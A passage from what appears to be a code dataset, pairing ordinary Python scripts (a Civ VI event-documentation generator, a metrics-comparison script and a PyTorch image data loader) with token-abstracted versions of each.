+\n eventName + '.md')\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n f.write('# ' + fullName + '\\n')\n f.write('## Description\\n')\n f.write('TBD\\n')\n f.write('\\n')\n f.write('## Usage\\n')\n argumentsText = ', '.join(arguments)\n argumentsText = argumentsText.replace('`', '')\n f.write('> `' + fullName + '(' + argumentsText + ')`\\n\\n')\n f.write('Regular event: you can subscribe to it through `' + fullName +\n \"\"\".Add(<function handler>)`\n\"\"\")\n f.write('\\n')\n f.write('### Parameters\\n')\n argumentsList = '\\n- '.join(arguments)\n if len(argumentsList) > 0:\n argumentsList = '- ' + argumentsList\n f.write(argumentsList)\n", "<import token>\n<assignment token>\nwith open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in reader:\n if i < 4:\n i += 1\n continue\n eventName = row[3]\n eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'\n argumentName = row[4]\n argumentType = row[5][1:]\n try:\n events[eventName]\n except Exception:\n events[eventName] = {'eventType': eventType, 'arguments': []}\n eventTypes.add(eventType)\n if argumentName:\n argumentText = '`' + argumentName\n if argumentType:\n argumentText += ' [' + argumentType + ']'\n argumentText += '`'\n events[eventName]['arguments'].append(argumentText)\nfor eventType in eventTypes:\n filename = '../EventObjects/' + eventType + '.md'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n eventIndices[eventType] = f\n f.write('## Static Events\\n')\n f.write('Events can be subscribed by using `' + eventType +\n '.SomeEvent.Add(SomeFunction)`.\\n')\n f.write('\\n')\n f.write('| Name | Parameters |\\n')\n f.write('|:---- |:--------- |\\n')\nfor eventName in events:\n event = events[eventName]\n eventType = event['eventType']\n eventIndex = eventIndices[eventType]\n arguments = event['arguments']\n indexEntry = '| [[' + eventType + '.' + eventName + ']] | '\n if len(arguments) > 0:\n indexEntry += '<br/>'.join(arguments)\n indexEntry += ' |\\n'\n eventIndex.write(indexEntry)\n fullName = eventType + '.' + eventName\n filename = ('../EventObjects/' + eventType + '/' + eventType + '.' +\n eventName + '.md')\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n f.write('# ' + fullName + '\\n')\n f.write('## Description\\n')\n f.write('TBD\\n')\n f.write('\\n')\n f.write('## Usage\\n')\n argumentsText = ', '.join(arguments)\n argumentsText = argumentsText.replace('`', '')\n f.write('> `' + fullName + '(' + argumentsText + ')`\\n\\n')\n f.write('Regular event: you can subscribe to it through `' + fullName +\n \"\"\".Add(<function handler>)`\n\"\"\")\n f.write('\\n')\n f.write('### Parameters\\n')\n argumentsList = '\\n- '.join(arguments)\n if len(argumentsList) > 0:\n argumentsList = '- ' + argumentsList\n f.write(argumentsList)\n", "<import token>\n<assignment token>\n<code token>\n" ]
false
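Record 77 probes `events[eventName]` inside a bare try/except just to create missing entries; `dict.setdefault` says the same thing directly and also removes the manual row counter. A condensed sketch of the grouping step, assuming the CSV layout the record implies (event name in column 3, GameEvents flag in column 10, argument name and type in columns 4 and 5):

import csv
import itertools

events = {}
with open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:
    reader = csv.reader(csvfile, delimiter=',', quotechar='|')
    for row in itertools.islice(reader, 4, None):        # skip the four header rows
        event_type = 'GameEvents' if row[10] else 'Events'
        event = events.setdefault(row[3], {'eventType': event_type, 'arguments': []})
        if row[4]:                                       # argument name present
            text = '`' + row[4]
            if row[5][1:]:                               # argument type present
                text += ' [' + row[5][1:] + ']'
            event['arguments'].append(text + '`')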
78
79c043fc862e77bea5adc3f1c6bb9a6272f19c75
#!/usr/bin/env python import socket name = socket.gethostname()
[ "#!/usr/bin/env python\n\nimport socket\n\nname = socket.gethostname()\n", "import socket\nname = socket.gethostname()\n", "<import token>\nname = socket.gethostname()\n", "<import token>\n<assignment token>\n" ]
false
79
22c498d84f40455d89ed32ccf3bf8778cb159579
import os import pandas as pd from tabulate import tabulate if __name__ == '__main__': bestPrecision = [0,0,0,0,0,0] bestPrecisionFile = ['','','','','',''] bestRecall = [0,0,0,0,0,0] bestRecallFile = ['','','','','',''] bestSupport = [0,0,0,0,0,0] bestSupportFile = ['','','','','',''] bestF1_Score = [0,0,0,0,0,0] bestF1_ScoreFile = ['','','','','',''] bestPrecisionOverall = 0 bestPrecisionOverallFile = '' bestRecallOverall = 0 bestRecallOverallFile = '' bestSupportOverall = 0 bestSupportOverallFile = '' bestF1_ScoreOverall = 0 bestF1_ScoreOverallFile = '' for file in os.listdir("results"): # (0.359*a)+(0.256*b)+(0.205*c)+(0.087*d)+(0.073*e)+(0.016*f) df = pd.read_csv("results/"+file) for i in range(0,6): if bestF1_Score[i] < df["f1_score"][i]: bestF1_Score[i] = df["f1_score"][i] bestF1_ScoreFile[i]=file if bestPrecision[i] < df["precision"][i]: bestPrecision[i] = df["precision"][i] bestPrecisionFile[i] = file if bestRecall[i] < df["recall"][i]: bestRecall[i] = df["recall"][i] bestRecallFile[i] = file if bestSupport[i] < df["support"][i]: bestSupport[i] = df["support"][i] bestSupportFile[i] = file currPrecision = 0 currRecall = 0 currSupport = 0 currF1_Score = 0 for idx,value in enumerate([0.359,0.256,0.205,0.087,0.073,0.016]): currF1_Score += (value * df["f1_score"][idx]) currPrecision += (value * df["precision"][idx]) currRecall += (value * df["recall"][idx]) currSupport += (value * df["support"][idx]) if currPrecision > bestPrecisionOverall: bestPrecisionOverall=currPrecision bestPrecisionOverallFile = file print(file) print(bestPrecisionOverall) if currRecall > bestRecallOverall: bestRecallOverall=currRecall bestRecallOverallFile = file if currSupport > bestSupportOverall: bestSupportOverall=currSupport bestSupportOverallFile = file if currF1_Score > bestF1_ScoreOverall: bestF1_ScoreOverall=currF1_Score bestF1_ScoreOverallFile = file bestPrecision.insert(0,"Precision") bestPrecisionFile.insert(0, "Precision") bestRecall.insert(0, "Recall") bestRecallFile.insert(0, "Recall") bestSupport.insert(0, "Support") bestSupportFile.insert(0, "Support") bestF1_Score.insert(0, "F1_SCORE") bestF1_ScoreFile.insert(0, "F1_SCORE") tableSpecific = [["","Class0","Class1","Class2","Class3","Class4","Class5"], bestPrecision,bestPrecisionFile,bestRecall,bestRecallFile, bestSupport,bestSupportFile,bestF1_Score,bestF1_ScoreFile] tableGeneral = [ ["Precision Best","Recall Best","Support Best","F1_Score Best"], [bestPrecisionOverall,bestRecallOverall,bestSupportOverall,bestF1_ScoreOverall], [bestPrecisionOverallFile,bestRecallOverallFile,bestSupportOverallFile,bestF1_ScoreOverallFile]] print(tabulate(tableSpecific)) print(tabulate(tableGeneral))
[ "import os\nimport pandas as pd\nfrom tabulate import tabulate\n\nif __name__ == '__main__':\n\n bestPrecision = [0,0,0,0,0,0]\n bestPrecisionFile = ['','','','','','']\n bestRecall = [0,0,0,0,0,0]\n bestRecallFile = ['','','','','','']\n bestSupport = [0,0,0,0,0,0]\n bestSupportFile = ['','','','','','']\n bestF1_Score = [0,0,0,0,0,0]\n bestF1_ScoreFile = ['','','','','','']\n\n bestPrecisionOverall = 0\n bestPrecisionOverallFile = ''\n bestRecallOverall = 0\n bestRecallOverallFile = ''\n bestSupportOverall = 0\n bestSupportOverallFile = ''\n bestF1_ScoreOverall = 0\n bestF1_ScoreOverallFile = ''\n\n for file in os.listdir(\"results\"):\n\n # (0.359*a)+(0.256*b)+(0.205*c)+(0.087*d)+(0.073*e)+(0.016*f)\n df = pd.read_csv(\"results/\"+file)\n\n for i in range(0,6):\n if bestF1_Score[i] < df[\"f1_score\"][i]:\n bestF1_Score[i] = df[\"f1_score\"][i]\n bestF1_ScoreFile[i]=file\n if bestPrecision[i] < df[\"precision\"][i]:\n bestPrecision[i] = df[\"precision\"][i]\n bestPrecisionFile[i] = file\n if bestRecall[i] < df[\"recall\"][i]:\n bestRecall[i] = df[\"recall\"][i]\n bestRecallFile[i] = file\n if bestSupport[i] < df[\"support\"][i]:\n bestSupport[i] = df[\"support\"][i]\n bestSupportFile[i] = file\n\n currPrecision = 0\n currRecall = 0\n currSupport = 0\n currF1_Score = 0\n\n for idx,value in enumerate([0.359,0.256,0.205,0.087,0.073,0.016]):\n currF1_Score += (value * df[\"f1_score\"][idx])\n currPrecision += (value * df[\"precision\"][idx])\n currRecall += (value * df[\"recall\"][idx])\n currSupport += (value * df[\"support\"][idx])\n\n if currPrecision > bestPrecisionOverall:\n bestPrecisionOverall=currPrecision\n bestPrecisionOverallFile = file\n print(file)\n print(bestPrecisionOverall)\n if currRecall > bestRecallOverall:\n bestRecallOverall=currRecall\n bestRecallOverallFile = file\n if currSupport > bestSupportOverall:\n bestSupportOverall=currSupport\n bestSupportOverallFile = file\n if currF1_Score > bestF1_ScoreOverall:\n bestF1_ScoreOverall=currF1_Score\n bestF1_ScoreOverallFile = file\n\n bestPrecision.insert(0,\"Precision\")\n bestPrecisionFile.insert(0, \"Precision\")\n bestRecall.insert(0, \"Recall\")\n bestRecallFile.insert(0, \"Recall\")\n bestSupport.insert(0, \"Support\")\n bestSupportFile.insert(0, \"Support\")\n bestF1_Score.insert(0, \"F1_SCORE\")\n bestF1_ScoreFile.insert(0, \"F1_SCORE\")\n\n tableSpecific = [[\"\",\"Class0\",\"Class1\",\"Class2\",\"Class3\",\"Class4\",\"Class5\"],\n bestPrecision,bestPrecisionFile,bestRecall,bestRecallFile,\n bestSupport,bestSupportFile,bestF1_Score,bestF1_ScoreFile]\n\n tableGeneral = [ [\"Precision Best\",\"Recall Best\",\"Support Best\",\"F1_Score Best\"],\n [bestPrecisionOverall,bestRecallOverall,bestSupportOverall,bestF1_ScoreOverall],\n [bestPrecisionOverallFile,bestRecallOverallFile,bestSupportOverallFile,bestF1_ScoreOverallFile]]\n\n print(tabulate(tableSpecific))\n print(tabulate(tableGeneral))\n", "import os\nimport pandas as pd\nfrom tabulate import tabulate\nif __name__ == '__main__':\n bestPrecision = [0, 0, 0, 0, 0, 0]\n bestPrecisionFile = ['', '', '', '', '', '']\n bestRecall = [0, 0, 0, 0, 0, 0]\n bestRecallFile = ['', '', '', '', '', '']\n bestSupport = [0, 0, 0, 0, 0, 0]\n bestSupportFile = ['', '', '', '', '', '']\n bestF1_Score = [0, 0, 0, 0, 0, 0]\n bestF1_ScoreFile = ['', '', '', '', '', '']\n bestPrecisionOverall = 0\n bestPrecisionOverallFile = ''\n bestRecallOverall = 0\n bestRecallOverallFile = ''\n bestSupportOverall = 0\n bestSupportOverallFile = ''\n bestF1_ScoreOverall = 0\n bestF1_ScoreOverallFile = 
''\n for file in os.listdir('results'):\n df = pd.read_csv('results/' + file)\n for i in range(0, 6):\n if bestF1_Score[i] < df['f1_score'][i]:\n bestF1_Score[i] = df['f1_score'][i]\n bestF1_ScoreFile[i] = file\n if bestPrecision[i] < df['precision'][i]:\n bestPrecision[i] = df['precision'][i]\n bestPrecisionFile[i] = file\n if bestRecall[i] < df['recall'][i]:\n bestRecall[i] = df['recall'][i]\n bestRecallFile[i] = file\n if bestSupport[i] < df['support'][i]:\n bestSupport[i] = df['support'][i]\n bestSupportFile[i] = file\n currPrecision = 0\n currRecall = 0\n currSupport = 0\n currF1_Score = 0\n for idx, value in enumerate([0.359, 0.256, 0.205, 0.087, 0.073, 0.016]\n ):\n currF1_Score += value * df['f1_score'][idx]\n currPrecision += value * df['precision'][idx]\n currRecall += value * df['recall'][idx]\n currSupport += value * df['support'][idx]\n if currPrecision > bestPrecisionOverall:\n bestPrecisionOverall = currPrecision\n bestPrecisionOverallFile = file\n print(file)\n print(bestPrecisionOverall)\n if currRecall > bestRecallOverall:\n bestRecallOverall = currRecall\n bestRecallOverallFile = file\n if currSupport > bestSupportOverall:\n bestSupportOverall = currSupport\n bestSupportOverallFile = file\n if currF1_Score > bestF1_ScoreOverall:\n bestF1_ScoreOverall = currF1_Score\n bestF1_ScoreOverallFile = file\n bestPrecision.insert(0, 'Precision')\n bestPrecisionFile.insert(0, 'Precision')\n bestRecall.insert(0, 'Recall')\n bestRecallFile.insert(0, 'Recall')\n bestSupport.insert(0, 'Support')\n bestSupportFile.insert(0, 'Support')\n bestF1_Score.insert(0, 'F1_SCORE')\n bestF1_ScoreFile.insert(0, 'F1_SCORE')\n tableSpecific = [['', 'Class0', 'Class1', 'Class2', 'Class3', 'Class4',\n 'Class5'], bestPrecision, bestPrecisionFile, bestRecall,\n bestRecallFile, bestSupport, bestSupportFile, bestF1_Score,\n bestF1_ScoreFile]\n tableGeneral = [['Precision Best', 'Recall Best', 'Support Best',\n 'F1_Score Best'], [bestPrecisionOverall, bestRecallOverall,\n bestSupportOverall, bestF1_ScoreOverall], [bestPrecisionOverallFile,\n bestRecallOverallFile, bestSupportOverallFile, bestF1_ScoreOverallFile]\n ]\n print(tabulate(tableSpecific))\n print(tabulate(tableGeneral))\n", "<import token>\nif __name__ == '__main__':\n bestPrecision = [0, 0, 0, 0, 0, 0]\n bestPrecisionFile = ['', '', '', '', '', '']\n bestRecall = [0, 0, 0, 0, 0, 0]\n bestRecallFile = ['', '', '', '', '', '']\n bestSupport = [0, 0, 0, 0, 0, 0]\n bestSupportFile = ['', '', '', '', '', '']\n bestF1_Score = [0, 0, 0, 0, 0, 0]\n bestF1_ScoreFile = ['', '', '', '', '', '']\n bestPrecisionOverall = 0\n bestPrecisionOverallFile = ''\n bestRecallOverall = 0\n bestRecallOverallFile = ''\n bestSupportOverall = 0\n bestSupportOverallFile = ''\n bestF1_ScoreOverall = 0\n bestF1_ScoreOverallFile = ''\n for file in os.listdir('results'):\n df = pd.read_csv('results/' + file)\n for i in range(0, 6):\n if bestF1_Score[i] < df['f1_score'][i]:\n bestF1_Score[i] = df['f1_score'][i]\n bestF1_ScoreFile[i] = file\n if bestPrecision[i] < df['precision'][i]:\n bestPrecision[i] = df['precision'][i]\n bestPrecisionFile[i] = file\n if bestRecall[i] < df['recall'][i]:\n bestRecall[i] = df['recall'][i]\n bestRecallFile[i] = file\n if bestSupport[i] < df['support'][i]:\n bestSupport[i] = df['support'][i]\n bestSupportFile[i] = file\n currPrecision = 0\n currRecall = 0\n currSupport = 0\n currF1_Score = 0\n for idx, value in enumerate([0.359, 0.256, 0.205, 0.087, 0.073, 0.016]\n ):\n currF1_Score += value * df['f1_score'][idx]\n currPrecision += value * 
df['precision'][idx]\n currRecall += value * df['recall'][idx]\n currSupport += value * df['support'][idx]\n if currPrecision > bestPrecisionOverall:\n bestPrecisionOverall = currPrecision\n bestPrecisionOverallFile = file\n print(file)\n print(bestPrecisionOverall)\n if currRecall > bestRecallOverall:\n bestRecallOverall = currRecall\n bestRecallOverallFile = file\n if currSupport > bestSupportOverall:\n bestSupportOverall = currSupport\n bestSupportOverallFile = file\n if currF1_Score > bestF1_ScoreOverall:\n bestF1_ScoreOverall = currF1_Score\n bestF1_ScoreOverallFile = file\n bestPrecision.insert(0, 'Precision')\n bestPrecisionFile.insert(0, 'Precision')\n bestRecall.insert(0, 'Recall')\n bestRecallFile.insert(0, 'Recall')\n bestSupport.insert(0, 'Support')\n bestSupportFile.insert(0, 'Support')\n bestF1_Score.insert(0, 'F1_SCORE')\n bestF1_ScoreFile.insert(0, 'F1_SCORE')\n tableSpecific = [['', 'Class0', 'Class1', 'Class2', 'Class3', 'Class4',\n 'Class5'], bestPrecision, bestPrecisionFile, bestRecall,\n bestRecallFile, bestSupport, bestSupportFile, bestF1_Score,\n bestF1_ScoreFile]\n tableGeneral = [['Precision Best', 'Recall Best', 'Support Best',\n 'F1_Score Best'], [bestPrecisionOverall, bestRecallOverall,\n bestSupportOverall, bestF1_ScoreOverall], [bestPrecisionOverallFile,\n bestRecallOverallFile, bestSupportOverallFile, bestF1_ScoreOverallFile]\n ]\n print(tabulate(tableSpecific))\n print(tabulate(tableGeneral))\n", "<import token>\n<code token>\n" ]
false
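The hard-coded weights (0.359, 0.256, 0.205, 0.087, 0.073, 0.016) in the row above sum to roughly 1 and look like per-class frequency proportions, so the "overall" numbers the script computes are support-weighted averages of the per-class metrics. A minimal sketch of that aggregation, assuming a results CSV with one row per class and precision/recall/f1_score/support columns, derives the weights from the support column instead of hard-coding them:

import pandas as pd

def weighted_scores(df: pd.DataFrame) -> pd.Series:
    # per-class frequency weights, recovered from the support column
    weights = df["support"] / df["support"].sum()
    return pd.Series({
        "precision": (weights * df["precision"]).sum(),
        "recall": (weights * df["recall"]).sum(),
        "f1_score": (weights * df["f1_score"]).sum(),
    })

# e.g. weighted_scores(pd.read_csv("results/" + file)) for each file, keeping the argmax.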
80
5b8c95354f8b27eff8226ace52ab9e97f98ae217
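# Data-loading utilities for the Dream AI image pipeline: CSV- and folder-backed
# image datasets with extra augmentation for minority classes, plus a DataProcessor
# that builds train/val/test splits, per-channel image statistics and dataloaders
# for single-label, multi-label, regression and object-detection targets.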
from dai_imports import* from obj_utils import* import utils class my_image_csv_dataset(Dataset): def __init__(self, data_dir, data, transforms_ = None, obj = False, minorities = None, diffs = None, bal_tfms = None): self.data_dir = data_dir self.data = data self.transforms_ = transforms_ self.tfms = None self.obj = obj self.minorities = minorities self.diffs = diffs self.bal_tfms = bal_tfms assert transforms_ is not None, print('Please pass some transforms.') def __len__(self): return len(self.data) def __getitem__(self, index): img_path = os.path.join(self.data_dir,self.data.iloc[index, 0]) img = Image.open(img_path) img = img.convert('RGB') img = torchvision.transforms.functional.to_grayscale(img,num_output_channels=3) y = self.data.iloc[index, 1] if self.minorities and self.bal_tfms: if y in self.minorities: if hasattr(self.bal_tfms,'transforms'): for tr in self.bal_tfms.transforms: tr.p = self.diffs[y] l = [self.bal_tfms] l.extend(self.transforms_) self.tfms = transforms.Compose(l) else: for t in self.bal_tfms: t.p = self.diffs[y] self.transforms_[1:1] = self.bal_tfms self.tfms = transforms.Compose(self.transforms_) # print(self.tfms) else: self.tfms = transforms.Compose(self.transforms_) else: self.tfms = transforms.Compose(self.transforms_) x = self.tfms(img) if self.obj: s = x.size()[1] if isinstance(s,tuple): s = s[0] row_scale = s/img.size[0] col_scale = s/img.size[1] y = rescale_bbox(y,row_scale,col_scale) y.squeeze_() y2 = self.data.iloc[index, 2] y = (y,y2) return (x,y) class my_image_folder(DatasetFolder): def __init__(self, root, transform=None, target_transform=None, loader=default_loader, minorities=None, diffs = None, bal_tfms=None, tta_tfms = None): super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS, transform=transform, target_transform=target_transform) self.imgs = self.samples self.minorities = minorities self.diffs = diffs self.bal_tfms = bal_tfms self.tta_tfms = tta_tfms self.tfms = None def __getitem__(self,index): path, target = self.samples[index] sample = self.loader(path) if self.transform: if self.minorities and self.bal_tfms: if target in self.minorities: if hasattr(self.bal_tfms,'transforms'): for tr in self.bal_tfms.transforms: tr.p = self.diffs[target] l = [self.bal_tfms] l.extend(self.transform) self.tfms = transforms.Compose(l) else: for t in self.bal_tfms: t.p = self.diffs[target] self.tfms = transforms.Compose(self.bal_tfms + self.transform ) else: self.tfms = transforms.Compose(self.transform) elif self.tta_tfms: self.tfms = self.tta_tfms else: self.tfms = transforms.Compose(self.transform) sample = self.tfms(sample) if self.target_transform: target = self.target_transform(target) return sample, target def extract_data(dt): x = [] y = [] for a,b in dt: x.append(a) y.append(b) return x,y def listdir_fullpath(d): return [os.path.join(d, f) for f in os.listdir(d)] def get_minorities(df,thresh=0.8): c = df.iloc[:,1].value_counts() lc = list(c) max_count = lc[0] diffs = [1-(x/max_count) for x in lc] diffs = dict((k,v) for k,v in zip(c.keys(),diffs)) minorities = [c.keys()[x] for x,y in enumerate(lc) if y < (thresh*max_count)] return minorities,diffs def csv_from_path(path, img_dest): path = Path(path) img_dest = Path(img_dest) labels_paths = list(path.iterdir()) tr_images = [] tr_labels = [] for l in labels_paths: if l.is_dir(): for i in list(l.iterdir()): if i.suffix in IMG_EXTENSIONS: name = i.name label = l.name new_name = '{}_{}'.format(path.name,name) new_path = img_dest/new_name # print(new_path) os.rename(i,new_path) 
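                    # the renamed file now lives in img_dest; record its new name and class label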
tr_images.append(new_name) tr_labels.append(label) # os.rmdir(l) tr_img_label = {'Img':tr_images, 'Label': tr_labels} csv = pd.DataFrame(tr_img_label,columns=['Img','Label']) csv = csv.sample(frac=1).reset_index(drop=True) return csv def add_extension(a,e): a = [x+e for x in a] return a def one_hot(targets, multi = False): if multi: binerizer = MultiLabelBinarizer() dai_1hot = binerizer.fit_transform(targets) else: binerizer = LabelBinarizer() dai_1hot = binerizer.fit_transform(targets) return dai_1hot,binerizer.classes_ def get_index(arr,a): for i in range(len(arr)): if sum(arr[i] == a) == len(a): return i return False def rescale_bbox(bb,row_scale,col_scale): bb = bb.reshape((-1,4)) for b in bb: r1,c1,r2,c2 = b b[0] = int(np.round(r1*col_scale)) b[1] = int(np.round(c1*row_scale)) b[2] = int(np.round(r2*col_scale)) b[3] = int(np.round(c2*row_scale)) # bb = torch.tensor([bb_hw(b) for b in bb.reshape(-1,4)]) # for b in bb: # r1,c1,r2,c2 = b # b[0] = int(np.round(r1*row_scale)) # b[1] = int(np.round(c1*col_scale)) # b[2] = int(np.round(r2*row_scale)) # b[3] = int(np.round(c2*col_scale)) # if(sum(b)) == 1: # b[0],b[1],b[2],b[3] = 0,0,0,0 bb = bb.reshape((1,-1)) return bb def get_img_stats(dataset,sz): size = int(len(dataset)*sz) i = 0 imgs = [] for img,_ in dataset: # print(img.size()) if i > size: break imgs.append(img) i+=1 imgs_ = torch.stack(imgs,dim=3) imgs_ = imgs_.view(3,-1) imgs_mean = imgs_.mean(dim=1) imgs_std = imgs_.std(dim=1) return imgs_mean,imgs_std def split_df(train_df,test_size = 0.15): try: train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2,stratify = train_df.iloc[:,1]) except: train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2) train_df = train_df.reset_index(drop = True) val_df = val_df.reset_index(drop = True) return train_df,val_df def save_obj(obj, path): with open(path, 'wb') as f: pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL) def load_obj(path): with open(path, 'rb') as f: return pickle.load(f) class DataProcessor: def __init__(self, data_path = None, train_csv = None, val_csv = None, reg = False, tr_name = 'train', val_name = 'val', test_name = 'test', extension = None, setup_data = True): print('+------------------------------------+') print('| Dream AI |') print('+------------------------------------+') print() self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") self.data_path,self.train_csv,self.val_csv,self.reg,self.tr_name,self.val_name,self.test_name,self.extension = (data_path,train_csv, val_csv,reg,tr_name,val_name,test_name,extension) self.obj = False self.multi_label = False if setup_data: self.set_up_data() def set_up_data(self,split_size = 0.15): data_path,train_csv,val_csv,tr_name,val_name,test_name = (self.data_path,self.train_csv,self.val_csv,self.tr_name,self.val_name,self.test_name) # check if paths given and also set paths if not data_path: data_path = os.getcwd() + '/' tr_path = os.path.join(data_path,tr_name) val_path = os.path.join(data_path,val_name) test_path = os.path.join(data_path,test_name) if os.path.exists(os.path.join(data_path,tr_name+'.csv')): train_csv = tr_name+'.csv' # if os.path.exists(os.path.join(data_path,val_name+'.csv')): # val_csv = val_name+'.csv' # if os.path.exists(os.path.join(data_path,test_name+'.csv')): # test_csv = test_name+'.csv' # paths to csv if not train_csv: print('no') train_csv,val_csv,test_csv = self.data_from_paths_to_csv(data_path,tr_path,val_path,test_path) train_csv_path = os.path.join(data_path,train_csv) train_df = 
pd.read_csv(train_csv_path) if 'Unnamed: 0' in train_df.columns: train_df = train_df.drop('Unnamed: 0', 1) if len(train_df.columns) > 2: self.obj = True img_names = [str(x) for x in list(train_df.iloc[:,0])] if self.extension: img_names = add_extension(img_names,self.extension) if val_csv: val_csv_path = os.path.join(data_path,val_csv) val_df = pd.read_csv(val_csv_path) val_targets = list(map(str,list(val_df.iloc[:,1]))) if test_csv: test_csv_path = os.path.join(data_path,test_csv) test_df = pd.read_csv(test_csv_path) test_targets = list(map(str,list(test_df.iloc[:,1]))) targets = list(map(str,list(train_df.iloc[:,1]))) lengths = [len(t) for t in [s.split() for s in targets]] self.target_lengths = lengths split_targets = [t.split() for t in targets] if self.obj: print('\nObject Detection\n') # bounding boxes int_targets = [list(map(float,x)) for x in split_targets] zero_targets = np.zeros((len(targets),max(lengths)),dtype=int) for i,t in enumerate(zero_targets): t[len(t)-len(int_targets[i]):] = int_targets[i] zero_targets[i] = t train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets] # one-hot classes obj_targets = list(map(str,list(train_df.iloc[:,2]))) obj_split_targets = [t.split() for t in obj_targets] try: obj_split_targets = [list(map(int,x)) for x in obj_split_targets] except: pass dai_onehot,onehot_classes = one_hot(obj_split_targets,True) # train_df['one_hot'] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot] # class indexes c_names = list(onehot_classes) class_idx = [[c_names.index(i) for i in c] for c in obj_split_targets] zero_idx = np.zeros((len(targets),max(lengths)//4),dtype=int) # print(zero_idx.shape) for i,t in enumerate(zero_idx): # temp_l = len(class_idx[i]) # if temp_l > 90: # print(i,temp_l) t[len(t)-len(class_idx[i]):] = class_idx[i] zero_idx[i] = t train_df.iloc[:,2] = [torch.from_numpy(z).type(torch.LongTensor) for z in zero_idx] self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes # self.set_up_object_detection([4,2,1],[0.7, 1., 1.3],[(1.,1.), (1.,0.5), (0.5,1.)]) elif self.reg: print('\nRegression\n') int_targets = [list(map(int,x)) for x in split_targets] zero_targets = np.zeros((len(targets),max(lengths)),dtype=int) for i,t in enumerate(zero_targets): t[len(t)-len(int_targets[i]):] = int_targets[i] zero_targets[i] = t train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets] self.data_dir,self.num_classes,self.class_names = data_path, max(lengths),np.unique(zero_targets,axis=1) elif lengths[1:] != lengths[:-1]: self.multi_label = True print('\nMulti-label Classification\n') try: split_targets = [list(map(int,x)) for x in split_targets] except: pass dai_onehot,onehot_classes = one_hot(split_targets,self.multi_label) train_df.iloc[:,1] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot] self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes else: print('\nSingle-label Classification\n') unique_targets = list(np.unique(targets)) target_ids = [unique_targets.index(x) for x in targets] train_df.iloc[:,1] = target_ids if val_csv: target_ids = [unique_targets.index(x) for x in val_targets] val_df.iloc[:,1] = target_ids if test_csv: target_ids = [unique_targets.index(x) for x in test_targets] test_df.iloc[:,1] = target_ids self.data_dir,self.num_classes,self.class_names = data_path,len(unique_targets),unique_targets # self.models_path = os.path.join(self.data_dir, 'models') # 
os.makedirs(self.models_path,exist_ok=True) if not val_csv: train_df,val_df = split_df(train_df,split_size) if not test_csv: val_df,test_df = split_df(val_df,split_size) tr_images = [str(x) for x in list(train_df.iloc[:,0])] val_images = [str(x) for x in list(val_df.iloc[:,0])] test_images = [str(x) for x in list(test_df.iloc[:,0])] if self.extension: tr_images = add_extension(tr_images,self.extension) val_images = add_extension(val_images,self.extension) test_images = add_extension(test_images,self.extension) train_df.iloc[:,0] = tr_images val_df.iloc[:,0] = val_images test_df.iloc[:,0] = test_images train_df.to_csv(os.path.join(data_path,'train.csv'),index=False) val_df.to_csv(os.path.join(data_path,'val.csv'),index=False) test_df.to_csv(os.path.join(data_path,'test.csv'),index=False) self.minorities,self.class_diffs = None,None if (not self.obj) or (not self.multi_label): self.minorities,self.class_diffs = get_minorities(train_df) self.data_dfs = {self.tr_name:train_df, self.val_name:val_df, self.test_name:test_df} data_dict = {'data_dfs':self.data_dfs,'data_dir':self.data_dir,'num_classes':self.num_classes,'class_names':self.class_names, 'minorities':self.minorities,'class_diffs':self.class_diffs,'obj':self.obj,'multi_label':self.multi_label} # save_obj(data_dict,os.path.join(self.data_dir,'data_dict.pkl')) self.data_dict = data_dict return data_dict def data_from_paths_to_csv(self,data_path,tr_path,val_path = None,test_path = None): train_df = csv_from_path(tr_path,tr_path) train_df.to_csv(os.path.join(data_path,self.tr_name+'.csv'),index=False) ret = (self.tr_name+'.csv',None) if val_path is not None: val_exists = os.path.exists(val_path) if val_exists: val_df = csv_from_path(val_path,tr_path) val_df.to_csv(os.path.join(data_path,self.val_name+'.csv'),index=False) ret = (self.tr_name+'.csv',self.val_name+'.csv') if test_path is not None: test_exists = os.path.exists(test_path) if test_exists: test_df = csv_from_path(test_path,tr_path) test_df.to_csv(os.path.join(data_path,self.test_name+'.csv'),index=False) ret = (self.tr_name+'.csv',self.val_name+'.csv',self.test_name+'.csv') return ret def get_data(self, data_dict = None, s = (224,224), dataset = my_image_csv_dataset, bs = 32, balance = False, tfms = None, bal_tfms = None, tta = False, num_workers = 4, stats_percentage = 0.6): self.image_size = s if not data_dict: data_dict = self.data_dict data_dfs,data_dir,minorities,class_diffs,obj,multi_label = (data_dict['data_dfs'],data_dict['data_dir'],data_dict['minorities'], data_dict['class_diffs'],data_dict['obj'],data_dict['multi_label']) if obj or multi_label: balance = False if tta: tta_tfms = {self.tr_name: transforms.Compose( [ # transforms.TenCrop(s), transforms.FiveCrop(s[0]), transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])), transforms.Lambda(lambda crops:torch.stack( [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops])) ]), self.val_name: transforms.Compose( [ # transforms.TenCrop(s), transforms.FiveCrop(s[0]), transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])), transforms.Lambda(lambda crops:torch.stack( [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops])) ]), self.test_name: transforms.Compose( [ # transforms.TenCrop(s), transforms.FiveCrop(s[0]), transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])), 